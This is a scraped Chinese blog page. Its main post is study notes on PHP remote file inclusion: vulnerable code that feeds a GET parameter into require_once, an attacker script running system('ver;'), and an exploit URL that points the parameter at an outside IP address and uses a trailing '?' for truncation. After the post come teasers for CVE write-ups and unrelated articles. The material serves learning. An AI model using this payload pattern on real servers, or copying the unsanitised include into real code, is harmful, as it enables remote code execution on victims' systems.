php本地文件包含 截断,php远程文件包含截断问题
今天在学习《白帽子讲web安全》一书是,提到一个php远程文件包含漏洞
可以从攻击者服务器中的一个写好的攻击脚本中远程执行命令
服务器中有漏洞的页面代码为:
#test.php
#error_reporting(0);
$route="share";
$basePath=$_GET['param'];
if ($route == "share")
{
require_once $basePath.'/action/mshare.php';
}
elseif ($route == "sharelink")
{
require_once $basePath.'/action/m_shareliink.php';
}
攻击者服务器中的攻击脚本为:
#test1.txt
system("ver;"); #此处可以自己定义要执行的命令
?>
攻击者可以构造如下url远程调用攻击者服务器上的攻击脚本:
/test.php/?param=http://23.105.202.153/test.txt?
最后的问号会截断require_once在$basePath参数后的字符串
这里有一个问题,就是攻击者的攻击脚本只能保存为txt格式,而不能保存为php格式,否则会导致攻击脚本无法在受害者机器上运行。
还有一个问题需要解决,就是无法向攻击者编写的脚本传递参数,如果攻击者脚本加入了参数,则会导致无法截断,这一问题需要解决。
18.phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)
phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) phpMyAdmin是一套开源的.基于Web的MySQL数据库管理工具.其index.php中存在一处文件包含逻辑, ...
DedeCMS 5.7 sp1远程文件包含漏洞(CVE-2015-4553)
DedeCMS 5.7 sp1远程文件包含漏洞(CVE-2015-4553) 一.漏洞描述 该漏洞在/install/index.php(index.php.bak)文件中,漏洞起因是$$符号使用不当 ...
CVE-2018-12613-phpmyadmin4.8.1远程文件包含漏洞复现
CVE-2018-12613-phpmyadmin4.8.1远程文件包含漏洞复现 参考文章1 参考文章2 By:Mirror王宇阳 漏洞原理 攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞. ...
phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)
漏洞详情 范围 phpMyAdmin 4.8.0和4.8.1 原理 首先在index.php 50-63行代码 $target_blacklist = array ( 'import.php', 'e ...
记一次phpmyadmin 4.8.1 远程文件包含漏洞(BUUCTF web)
题目很简单,一个滑稽 打开源码,发现存在source.php文件 于是访问文件,发现出现一串php源码 提示存在hint.php,于是访问发现一句话 flag not here, and flag i ...
利用PHP应用程序中的远程文件包含(RFI)并绕过远程URL包含限制
来源:http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.h ...
dedecmsv5.7sp1远程文件包含漏洞审计
dedecms5.7 sp1版本存在远程文件包含漏洞,在此记录审计复现漏洞过程. 漏洞在/install/index.php(index.php.bak)文件中,漏洞起因是$$符号使用不当,导致变量覆 ...
php本地及远程文件包含漏洞
在php程序中包含有file inclusion的时候,php要开启一下两个功能: allow_url_fopen onallow_url_include on 但是开启这两个功能之后伴随的是url漏 ...
PHP文件包含漏洞剖析
一. 什么才是”远程文件包含漏洞”?回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的. ...
随机推荐
(原)3.1 Zookeeper应用 - Master选举
本文为原创文章,转载请注明出处,谢谢 Master 选举 1.原理 服务器争抢创建标志为Master的临时节点 服务器监听标志为Master的临时节点,当监测到节点删除事件后展开新的一轮争抢 某个服务 ...
PowerDesigner之PDM(物理概念模型)
一.PDM概述 PDM(物理数据模型),通俗地理解,就是在PowerDesigner中以图形化的方式展示和设计数据库. PDM中涉及到的基本概念包括: 表: 列: 视图: 主键: 候选键: 外键: 存 ...
使用UIBezierPath和CAShapeLayer画各种图形
转载自:http://www.cocoachina.com/ios/20160214/15251.html CAShapeLayer 是 CALayer 的子类,但是比 CALayer 更灵活,可以画 ...
Java学习之抽象类的总结
抽象类的特点:1,方法只有声明没有实现时,该方法就是抽象方法,需要被abstract修饰,抽象方法必须定义在抽象类中,该类必须也被abstract修饰.2,抽象类不可以被实例化.为什么?因为调用抽象方 ...
IS_EER分析
下面我们就来具体分析一下这段代码,看看内核中的巧妙设计思路. 要想明白IS_ERR(),首先理解要内核空间.所有的驱动程序都是运行在内核空间,内核空间虽然很大,但总是有限的,而在这有限的空间中,其最后 ...
JXLS使用方法(文件上传读取)xlsx文件读取
1.官方文档:http://jxls.sourceforge.net/reference/reader.html 2.demo git地址:https://bitbucket.org/leonate/ ...
cross compile gdbserver
1. 下载gdb源码,7.12版本,下载地址:ftp://ftp.gnu.org/gnu/gdb.2. 编译gdb:0> cd gdb-7.121> mkdir __install2> ...
Mysql数据库多表查询
一.介绍 首先说一下,我们写项目一般都会建一个数据库,那数据库里面是不是存了好多张表啊,不可能把所有的数据都放到一张表里面,肯定要分表来存数据,这样节省空间,数据的组织结构更清晰,解耦和程度更高,但是 ...
Docker基础-搭建本地私有仓库
1.使用registry镜像创建私有仓库 安装Docker后,可以通过官方提供的registry镜像来简单搭建一套本地私有仓库环境: docker run -d -p 5000:5000 regist ...
Java不同场景oom错误探究及解决办法
1.OOM for Heap=>java.lang.OutOfMemoryError: Java heap space 分 析 此OOM是由于JVM中heap的最大值不满足需要,将设置heap ...
php本地文件包含 截断,php远程文件包含截断问题相关推荐
- java 文件包含漏洞_远程文件包含漏洞(pikachu)
漏洞介绍 File Inclusion(文件包含漏洞)概述 文件包含,是一个功能.在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件. 比如 ...
- php fopen下载文件,php fopen下载远程文件的函数 | 学步园
//下载附件 function get_file($url, $folder = "./") { set_time_limit (24 * 60 * 60); // 设置超时时间 ...
- php 读写远程文件内容,php获取远程文件内容的函数
一个简单的php获取远程文件内容的函数代码,兼容性强.直接调用就可以轻松获取远程文件的内容,使用这个函数也可获取图片.代码如下: /** * 读远程内容 * @return string */ fun ...
- python远程同步文件_Python实现的远程文件自动打包并下载功能示例
Python实现的远程文件自动打包并下载功能示例 发布时间:2020-08-19 23:32:33 来源:脚本之家 阅读:103 本文实例讲述了Python实现的远程文件自动打包并下载功能.分享给大家 ...
- java ftp 文件移动文件_java实现FTP远程文件移动(重命名、复制、拷贝)
首先就标题说明一点,java使用org.apache.commons.net.ftp.ftpclient包来操作FTP是很爽滴,但对远程文件操作,好像没有实现 复制文件的方法.我用的是文件移动(mov ...
- ios 从服务器获取文件,ios - 如何将远程文件(从远程SMB服务器获取)提供给某些请求 - 堆栈内存溢出...
当某些请求命中服务器(在移动应用程序上运行的服务器)时,我正在尝试将视频文件作为响应提供. 该视频文件可以存储在本地,也可以是外部存储的. 我开始尝试提供位于SMB服务器上的文件,所以我尝试使用此代码 ...
- 本地文件包含和远程文件包含(超详细,小白也彳亍!)
为了防止代码重复,我们就有了,文件包含.很多网页如果要用到很多同样的函数,那么我们就可以使用这个文件包含函数,就避免了每个网页又去重复造轮子. 在index.php文件里包含1.txt,而1.txt的 ...
- php读取图片文件流,详解php文件包含原理(读取文件源码、图片马、各种协议、远程getshell等)...
详解php文件包含原理(读取文件源码.图片马.各种协议.远程getshell等) 作者是namezz (看完图相当于做了一轮实验系列) 现有文件代码如下 1.png (21.16 KB, 下载次数: ...
- include详解 shell_详解php文件包含原理(读取文件源码、图片马、各种协议、远程getshell等) ......
详解php文件包含原理(读取文件源码.图片马.各种协议.远程getshell等) 作者是namezz (看完图相当于做了一轮实验系列) 现有文件代码如下 include和include_once.re ...
最新文章
- Android -- TextView与EditText 同步显示
- 本来想用“{{”秀一波,结果却导致了内存溢出!
- linux /dev/snd,linux – / dev / tcp去了哪里?
- android 回收站设计,android-如何根据屏幕尺寸设置回收站视图项目的宽度尺寸?...
- day12 Python操作rabbitmq及pymsql
- C++中输入输出的十六进制八进制
- 转结构体_golang处理gb2312转utf8编码的问题
- python之路---03 整型 bool 字符串 for循环
- javaScrip第五天(1)
- Ubuntu 18.04 - 启动时停留在 start bpfilter
- AMD完成对赛灵思的收购
- POJ-2754 Similarity of necklaces 2 区间取下界操作+DP
- 达梦数据库存储过程调用
- Arduino UNO+TB6600驱动器控制步进电机正反转
- Excel如何从复杂文本中提取数字
- Java 10 大装 B 写法,看完可以出去吹牛逼了!
- 论文分享:基于深度强化学习的无人机三维导航
- 继机器人披萨后,我又吃了个机器人汉堡!
- webpack搭建服务器
- GitLab合并请求时出现 Validate branchesCannot Create: This merge request already existed
热门文章
- 网络嗅探与欺骗----函数sniff()、ARP的原理、ARP欺骗、AARP欺骗的中间人攻击
- 响应式背景图片的几种方法
- 《Ivor Horton's Beginning Java》 Chapter1-7 读书笔记
- hp388服务器安装linux,hpe dl388 g10服务器安装centos7.6
- Error:间接寻址级别不同——C++真的魔鬼
- 强收红包漫天要价偷转黑车……滴滴网约车被指太任性
- 谐波减速器的结构简图及传动比说明
- 华为路由及静态路由的配置
- 骨传导耳机对听力有危害吗,骨传导耳机会不会伤害耳朵
- Android应用内展示office文件--腾讯浏览服务(TBS)